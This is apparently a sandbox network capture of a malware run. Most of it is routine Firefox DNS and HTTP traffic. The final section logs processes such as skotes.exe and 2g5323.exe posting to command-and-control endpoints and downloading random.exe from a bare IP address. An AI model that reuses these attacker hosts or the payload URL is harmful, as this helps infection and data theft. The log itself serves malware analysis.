                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    Response
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    34.149.97.1
                  • flag-us
                    DNS
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                  • flag-us
                    DNS
                    shavar.prod.mozaws.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN A
                    Response
                    shavar.prod.mozaws.net
                    IN A
                    44.228.225.150
                    shavar.prod.mozaws.net
                    IN A
                    35.85.93.176
                    shavar.prod.mozaws.net
                    IN A
                    54.213.181.160
                  • flag-us
                    DNS
                    shavar.prod.mozaws.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN A
                    Response
                    shavar.prod.mozaws.net
                    IN A
                    54.213.181.160
                    shavar.prod.mozaws.net
                    IN A
                    35.85.93.176
                    shavar.prod.mozaws.net
                    IN A
                    44.228.225.150
                  • flag-us
                    DNS
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    34.160.144.191
                  • flag-us
                    DNS
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN A
                    34.160.144.191
                  • flag-us
                    DNS
                    prod.ads.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • flag-us
                    DNS
                    prod.ads.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    216.58.213.14
                  • flag-us
                    DNS
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN AAAA
                    Response
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN AAAA
                    2600:1901:0:74e4::
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN AAAA
                    Response
                    youtube.com
                    IN AAAA
                    2a00:1450:4009:816::200e
                  • flag-us
                    DNS
                    shavar.prod.mozaws.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    shavar.prod.mozaws.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    IN AAAA
                    2600:1901:0:92a9::
                  • flag-us
                    DNS
                    prod.ads.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.ads.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-gb
                    GET
                    https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                    firefox.exe
                    Remote address:
                    216.58.213.14:443
                    Request
                    GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                    host: youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-gb
                    GET
                    https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    firefox.exe
                    Remote address:
                    216.58.213.14:443
                    Request
                    GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                    host: www.youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    cookie: YSC=bnzIUPKHiDU
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-us
                    DNS
                    14.213.58.216.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    14.213.58.216.in-addr.arpa
                    IN PTR
                    Response
                    14.213.58.216.in-addr.arpa
                    IN PTR
                    ber01s14-in-f141e100net
                    14.213.58.216.in-addr.arpa
                    IN PTR
                    lhr25s25-in-f14�H
                  • flag-us
                    DNS
                    www.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.youtube.com
                    IN A
                    Response
                    www.youtube.com
                    IN CNAME
                    youtube-ui.l.google.com
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.213.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                  • flag-us
                    DNS
                    www.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.youtube.com
                    IN A
                    Response
                    www.youtube.com
                    IN CNAME
                    youtube-ui.l.google.com
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    216.58.213.14
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                  • flag-us
                    DNS
                    youtube-ui.l.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube-ui.l.google.com
                    IN A
                    Response
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.206
                    youtube-ui.l.google.com
                    IN A
                    142.250.187.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.204.78
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.46
                    youtube-ui.l.google.com
                    IN A
                    142.250.180.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.169.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.178.14
                    youtube-ui.l.google.com
                    IN A
                    142.250.200.14
                    youtube-ui.l.google.com
                    IN A
                    172.217.16.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.201.110
                    youtube-ui.l.google.com
                    IN A
                    142.250.179.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.206
                    youtube-ui.l.google.com
                    IN A
                    216.58.212.238
                    youtube-ui.l.google.com
                    IN A
                    216.58.213.14
                  • flag-us
                    DNS
                    youtube-ui.l.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube-ui.l.google.com
                    IN AAAA
                    Response
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:826::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:822::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:823::200e
                    youtube-ui.l.google.com
                    IN AAAA
                    2a00:1450:4009:827::200e
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-gb
                    GET
                    https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    firefox.exe
                    Remote address:
                    142.250.200.46:443
                    Request
                    GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                    host: consent.youtube.com
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    cookie: YSC=bnzIUPKHiDU
                    cookie: SOCS=CAAaBgiAid66Bg
                    cookie: __Secure-YEC=CgtFU0FRaWRqZXZBRSjDtuK6BjIKCgJHQhIEGgAgYw%3D%3D
                    cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgYw%3D%3D
                    upgrade-insecure-requests: 1
                    sec-fetch-dest: document
                    sec-fetch-mode: navigate
                    sec-fetch-site: none
                    sec-fetch-user: ?1
                    te: trailers
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN A
                    Response
                    consent.youtube.com
                    IN A
                    142.250.200.46
                  • flag-us
                    DNS
                    firefox-settings-attachments.cdn.mozilla.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    firefox-settings-attachments.cdn.mozilla.net
                    IN A
                    Response
                    firefox-settings-attachments.cdn.mozilla.net
                    IN CNAME
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.117.121.53
                  • flag-us
                    DNS
                    consent.youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    consent.youtube.com
                    IN AAAA
                    Response
                    consent.youtube.com
                    IN AAAA
                    2a00:1450:4009:823::200e
                  • flag-us
                    GET
                    https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
                    firefox.exe
                    Remote address:
                    34.117.121.53:443
                    Request
                    GET /main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl HTTP/2.0
                    host: firefox-settings-attachments.cdn.mozilla.net
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: */*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    te: trailers
                  • flag-us
                    DNS
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    Response
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.117.121.53
                  • flag-us
                    DNS
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    IN AAAA
                  • flag-us
                    DNS
                    160.181.213.54.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    160.181.213.54.in-addr.arpa
                    IN PTR
                    Response
                    160.181.213.54.in-addr.arpa
                    IN PTR
                    ec2-54-213-181-160 us-west-2compute amazonawscom
                  • flag-us
                    DNS
                    238.16.217.172.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    238.16.217.172.in-addr.arpa
                    IN PTR
                    Response
                    238.16.217.172.in-addr.arpa
                    IN PTR
                    mad08s04-in-f141e100net
                    238.16.217.172.in-addr.arpa
                    IN PTR
                    lhr48s28-in-f14�I
                  • flag-us
                    DNS
                    150.225.228.44.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    150.225.228.44.in-addr.arpa
                    IN PTR
                    Response
                    150.225.228.44.in-addr.arpa
                    IN PTR
                    ec2-44-228-225-150 us-west-2compute amazonawscom
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.187.196
                  • flag-gb
                    GET
                    https://www.google.com/favicon.ico
                    firefox.exe
                    Remote address:
                    142.250.187.196:443
                    Request
                    GET /favicon.ico HTTP/2.0
                    host: www.google.com
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: image/avif,image/webp,*/*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    referer: https://consent.youtube.com/
                    sec-fetch-dest: image
                    sec-fetch-mode: no-cors
                    sec-fetch-site: cross-site
                    te: trailers
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.187.196
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN A
                    Response
                    www.google.com
                    IN A
                    142.250.187.196
                  • flag-us
                    DNS
                    www.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    www.google.com
                    IN AAAA
                    Response
                    www.google.com
                    IN AAAA
                    2a00:1450:4009:81f::2004
                  • flag-us
                    DNS
                    74.204.58.216.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    74.204.58.216.in-addr.arpa
                    IN PTR
                    Response
                    74.204.58.216.in-addr.arpa
                    IN PTR
                    lhr25s13-in-f741e100net
                    74.204.58.216.in-addr.arpa
                    IN PTR
                    lhr48s49-in-f10�H
                    74.204.58.216.in-addr.arpa
                    IN PTR
                    lhr25s13-in-f10�H
                  • flag-us
                    DNS
                    195.187.250.142.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    195.187.250.142.in-addr.arpa
                    IN PTR
                    Response
                    195.187.250.142.in-addr.arpa
                    IN PTR
                    lhr25s33-in-f31e100net
                  • flag-us
                    DNS
                    196.187.250.142.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    196.187.250.142.in-addr.arpa
                    IN PTR
                    Response
                    196.187.250.142.in-addr.arpa
                    IN PTR
                    lhr25s33-in-f41e100net
                  • flag-us
                    DNS
                    prod.balrog.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    Response
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    35.244.181.201
                  • flag-us
                    DNS
                    prod.balrog.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    Response
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN A
                    35.244.181.201
                  • flag-us
                    DNS
                    prod.balrog.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.balrog.prod.cloudops.mozgcp.net
                    IN AAAA
                    Response
                  • flag-us
                    DNS
                    201.181.244.35.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    201.181.244.35.in-addr.arpa
                    IN PTR
                    Response
                    201.181.244.35.in-addr.arpa
                    IN PTR
                    20118124435bcgoogleusercontentcom
                  • flag-us
                    DNS
                    ciscobinary.openh264.org
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    ciscobinary.openh264.org
                    IN A
                    Response
                    ciscobinary.openh264.org
                    IN CNAME
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com
                    a17.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com.mdc.edgesuite.net
                    a17.rackcdn.com.mdc.edgesuite.net
                    IN CNAME
                    a19.dscg10.akamai.net
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.155
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.209
                  • flag-us
                    DNS
                    ciscobinary.openh264.org
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    ciscobinary.openh264.org
                    IN A
                    Response
                    ciscobinary.openh264.org
                    IN CNAME
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com
                    a17.rackcdn.com
                    IN CNAME
                    a17.rackcdn.com.mdc.edgesuite.net
                    a17.rackcdn.com.mdc.edgesuite.net
                    IN CNAME
                    a19.dscg10.akamai.net
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.209
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.155
                  • flag-gb
                    GET
                    http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
                    firefox.exe
                    Remote address:
                    88.221.134.155:80
                    Request
                    GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
                    Host: ciscobinary.openh264.org
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    Accept: */*
                    Accept-Language: en-US,en;q=0.5
                    Accept-Encoding: gzip, deflate
                    Connection: keep-alive
                    Response
                    HTTP/1.1 200 OK
                    Last-Modified: Fri, 08 Nov 2024 02:37:54 GMT
                    ETag: 09372174e83dbbf696ee732fd2e875bb
                    Content-Length: 491284
                    Accept-Ranges: bytes
                    X-Timestamp: 1731033473.13891
                    Content-Type: application/zip
                    X-Trans-Id: txe2d6fd5524464f55a6fac-00673047f0dfw1
                    Cache-Control: public, max-age=124682
                    Expires: Thu, 12 Dec 2024 06:27:44 GMT
                    Date: Tue, 10 Dec 2024 19:49:42 GMT
                    Connection: keep-alive
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN A
                    Response
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.209
                    a19.dscg10.akamai.net
                    IN A
                    88.221.134.155
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN A
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN AAAA
                    Response
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:869b
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:86d1
                  • flag-us
                    DNS
                    a19.dscg10.akamai.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN AAAA
                    Response
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:86d1
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:869b
                  • flag-us
                    DNS
                    155.134.221.88.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    155.134.221.88.in-addr.arpa
                    IN PTR
                    Response
                    155.134.221.88.in-addr.arpa
                    IN PTR
                    a88-221-134-155deploystaticakamaitechnologiescom
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN A
                    Response
                    redirector.gvt1.com
                    IN A
                    142.250.187.206
                  • flag-gb
                    GET
                    https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                    firefox.exe
                    Remote address:
                    142.250.187.206:443
                    Request
                    GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip HTTP/2.0
                    host: redirector.gvt1.com
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: */*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    te: trailers
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN A
                    Response
                    redirector.gvt1.com
                    IN A
                    142.250.187.206
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN A
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN AAAA
                    Response
                    redirector.gvt1.com
                    IN AAAA
                    2a00:1450:4009:81f::200e
                  • flag-us
                    DNS
                    r4---sn-aigzrnsz.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r4---sn-aigzrnsz.gvt1.com
                    IN A
                    Response
                    r4---sn-aigzrnsz.gvt1.com
                    IN CNAME
                    r4.sn-aigzrnsz.gvt1.com
                    r4.sn-aigzrnsz.gvt1.com
                    IN A
                    74.125.175.169
                  • flag-us
                    DNS
                    r4---sn-aigzrnsz.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r4---sn-aigzrnsz.gvt1.com
                    IN A
                  • flag-gb
                    GET
                    https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com
                    firefox.exe
                    Remote address:
                    74.125.175.169:443
                    Request
                    GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com HTTP/1.1
                    Host: r4---sn-aigzrnsz.gvt1.com
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    Accept: */*
                    Accept-Language: en-US,en;q=0.5
                    Accept-Encoding: gzip, deflate, br
                    Connection: keep-alive
                    Response
                    HTTP/1.1 200 OK
                    Accept-Ranges: bytes
                    Cache-Control: public,max-age=86400
                    Content-Disposition: attachment
                    Content-Length: 14485862
                    Content-Security-Policy: default-src 'none'
                    Content-Type: application/zip
                    Etag: "1d3918c"
                    Server: downloads
                    X-Content-Type-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    X-Xss-Protection: 0
                    Date: Tue, 10 Dec 2024 09:04:14 GMT
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Last-Modified: Thu, 05 Oct 2023 00:56:47 GMT
                    Connection: keep-alive
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
                    Vary: Origin
                  • flag-us
                    DNS
                    r4.sn-aigzrnsz.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r4.sn-aigzrnsz.gvt1.com
                    IN A
                    Response
                    r4.sn-aigzrnsz.gvt1.com
                    IN A
                    74.125.175.169
                  • flag-us
                    DNS
                    r4.sn-aigzrnsz.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r4.sn-aigzrnsz.gvt1.com
                    IN AAAA
                    Response
                    r4.sn-aigzrnsz.gvt1.com
                    IN AAAA
                    2a00:1450:4009:1b::9
                  • flag-us
                    DNS
                    206.187.250.142.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    206.187.250.142.in-addr.arpa
                    IN PTR
                    Response
                    206.187.250.142.in-addr.arpa
                    IN PTR
                    lhr25s33-in-f141e100net
                  • flag-us
                    DNS
                    169.175.125.74.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    169.175.125.74.in-addr.arpa
                    IN PTR
                    Response
                    169.175.125.74.in-addr.arpa
                    IN PTR
                    lhr48s34-in-f91e100net
                  • 104.21.96.1:443
                    https://atten-supporse.biz/api
                    tls, http
                    2g5323.exe
                    1.1kB
                    4.7kB
                    11
                    8

                    HTTP Request

                    POST https://atten-supporse.biz/api

                    HTTP Response

                    200
                  • 172.67.206.64:443
                    https://covery-mover.biz/api
                    tls, http
                    2g5323.exe
                    1.0kB
                    4.8kB
                    9
                    9

                    HTTP Request

                    POST https://covery-mover.biz/api

                    HTTP Response

                    200
                  • 185.215.113.43:80
                    http://185.215.113.43/Zu7JuNko/index.php
                    http
                    skotes.exe
                    2.9kB
                    3.6kB
                    22
                    15

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200
                  • 23.214.143.155:443
                    https://steamcommunity.com/profiles/76561199724331900
                    tls, http
                    2g5323.exe
                    1.8kB
                    43.2kB
                    27
                    37

                    HTTP Request

                    GET https://steamcommunity.com/profiles/76561199724331900

                    HTTP Response

                    200
                  • 31.41.244.11:80
                    http://31.41.244.11/files/unique2/random.exe
                    http
                    skotes.exe
                    553.0kB
                    16.7MB
